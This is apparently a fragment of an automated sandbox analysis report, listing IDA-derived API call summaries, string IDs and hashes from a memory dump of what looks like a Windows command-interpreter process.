                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C021EAB12487259AFB782B64BC167BF26DCDB85355F24441EF546854C3EEB888808B26
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00019F3A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001A02D
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001A03F
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,00000001,?,00000001), ref: 0001A0E8
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandlememset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3784859044-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ec3d5e5411aed1a8512e7109111d6e8245df1eda845c04934fa1655c80615f19
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 08605ff21b73101908fb757500eb22686bf20adad808c42fa2a0ae053cf72943
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec3d5e5411aed1a8512e7109111d6e8245df1eda845c04934fa1655c80615f19
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53A10431A01211ABD735AF78D855AFFB3F5EF89720B24861DE45693291DB30EC81CB92
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00034A7B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00034B98
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00034BC5
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00034BD2
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00034BDC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00034C30
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s$/-.
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1033501010-531045382
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e2ee2e0595b8667b3a6f0c8205032b1b311eaccb4b4a8368eb87ee2b60a69895
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ca6923a9b5e67dcbf9bbbde9bc3ac0ef43b066360e3bd28c8a9f87542c75c04b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2ee2e0595b8667b3a6f0c8205032b1b311eaccb4b4a8368eb87ee2b60a69895
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6813432A4021596DB669A78CC46BFF73ECEF84700F10416AE402DF290EB75EE848615
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00036745
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 000367CF
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 000367F6
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,000120B8,00000000,00000002,?,00000000), ref: 00036867
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 000368A3
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 000368C5
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4081037667-3301834661
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 05a6d1af7b12b65e0dc98f17feca41036cc755b203abc22f34389036769b35f9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 83443da9585c52eda7aaca91b29ceafbb7130e953e366cec5cbd78ae3b4121be
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05a6d1af7b12b65e0dc98f17feca41036cc755b203abc22f34389036769b35f9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A611E75E40125ABDF359B28CC49AFB77FCEF59700F1482A9E809D7240DE328E84C6A1
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 0003650F
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00), ref: 00036545
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 00036553
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 00036590
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 000365AD
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,000120B8,?,00000000,02000000,?,?,?,00000000,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 000365D4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 000365EF
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: CloseDeleteValue$CreateOpen
• String ID: %s=%s
• API String ID: 1019019434-1087296587
• Opcode ID: 81d47dbe172769ea1db1f0b98ba8087f4e1997e650c2ce4ef9caf5ff0f7b9765
• Instruction ID: b2c3325e0336fad9e633643b8e82166c1d73acb684ad495bca596a3d5f2ec394
• Opcode Fuzzy Hash: 81d47dbe172769ea1db1f0b98ba8087f4e1997e650c2ce4ef9caf5ff0f7b9765
• Instruction Fuzzy Hash: 0641C771D04615BBDB325B58DC0AEEF7ABCEB8AF50F004129F80577251D7274D01CAA1
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: _wcsnicmpswscanf
• String ID: :EOF
• API String ID: 1534968528-551370653
• Opcode ID: 6daa88cfe1edc98925232916941acd01ee6d4405698f54272707dfde85e6017c
• Instruction ID: 1b624954349fc06132b0a4a9b8c4faf74d72a960d10f3631981b40efb87b7152
• Opcode Fuzzy Hash: 6daa88cfe1edc98925232916941acd01ee6d4405698f54272707dfde85e6017c
• Instruction Fuzzy Hash: 30314831608220BBEB606B58AC45BEA77F4EF47711F044415FD8A97291DB388CC2C765
APIs
• LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00036069
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 0003607E
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 000360DC
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00036128
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 0003614F
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00036186
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
• String ID: NTDLL.DLL$NtQueryInformationProcess
• API String ID: 1580871199-2613899276
• Opcode ID: 0b7407c0538c50e894bde0a96a706be68d568c885346ffd652b2f3a878c34e64
• Instruction ID: cd4669f8d4efdf3dba7b91e73607418a945ce34fa079b4c4df589e1190d69094
• Opcode Fuzzy Hash: 0b7407c0538c50e894bde0a96a706be68d568c885346ffd652b2f3a878c34e64
• Instruction Fuzzy Hash: 9A41A4B0A00219BBEB259B24CC85FBF77BCEB41745F0485A8A605E3281DB349E45CF69
APIs
• _wcsicmp.MSVCRT ref: 000265A4
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 000265D7
• _open_osfhandle.MSVCRT ref: 000265EB
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00032092
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: con
APIs
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 000361D7
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00036211
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00036254
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0003625B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0003628D
• RtlFreeHeap.NTDLL(00000000), ref: 00036294
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 0003629B
Strings
Similarity
• API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
• String ID: PE
APIs
• _wcsicmp.MSVCRT ref: 00018FCD
• _wcsicmp.MSVCRT ref: 00018FE3
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00019002
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00019013
  • Part of subcall function 0001A62F: wcschr.MSVCRT ref: 0001A635
Similarity
• API ID: _wcsicmp$AttributesErrorFileLastwcschr
• String ID:
APIs
• memset.MSVCRT ref: 00018060
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 000181BE
  • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
  • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 0001818C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00018197
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,-00000001,00000000,?,00000000), ref: 0002B09E
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0002B0AB
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00037FC9,?,000399AE,00000000,?,00000000,0002CF94,00000000,?), ref: 0002B0C1
                                                                                                                                                                                                                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 0002B0D5
                                                                                                                                                                                                                                                                                                                                                                                                                          • fflush.MSVCRT ref: 0002B0E3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018F21: _wcsicmp.MSVCRT ref: 00018FCD
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018F21: _wcsicmp.MSVCRT ref: 00018FE3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00019002
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00019013
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00058BF0,00000000,?), ref: 00018EC3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D3A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D44
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D57
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000180F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00021D61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000201F5: wcsrchr.MSVCRT ref: 000201FB
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3753564779-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0c9d8f666a2167cadb844b42bb46195dc09a2007eed4f436d6c44375aa888d3c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 17eea84611dcce643931cb26e0532cad64bad7ea9a6c92f3af972c1a17cf2a17
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c9d8f666a2167cadb844b42bb46195dc09a2007eed4f436d6c44375aa888d3c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A351D271B00221ABDB249BB4EC5A6EF77F9EF08710F144529F905D7292EB748AC1CB51
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00038B7B
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00039323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00038B83
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A16C: _close.MSVCRT ref: 0001A19B
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00038BB5
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00038BBD
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00038BCF
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00038BD7
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,?), ref: 00038BED
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002654B: _wcsicmp.MSVCRT ref: 000265A4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 000265D7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002654B: _open_osfhandle.MSVCRT ref: 000265EB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00032092
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00038C1A
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00038C22
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4208585293-0
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: memset
• String ID: %s
• API String ID: 2221118986-3043279178
APIs
  • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
  • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
• _wcsnicmp.MSVCRT ref: 0001C1B7
• wcstol.MSVCRT ref: 0001C1FC
• wcstol.MSVCRT ref: 0001C28A
• longjmp.MSVCRT(?,000000FF), ref: 0002CFB0
• longjmp.MSVCRT(?,000000FF), ref: 0002CFC4
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000_alpha.jbxd
Similarity
• API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
• String ID:
• API String ID: 2863075230-0
APIs
• memset.MSVCRT ref: 00022795
  • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
• memset.MSVCRT ref: 0002280E
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 0002281D
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 00022857
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,00000002,00000000), ref: 0002290B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
• Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
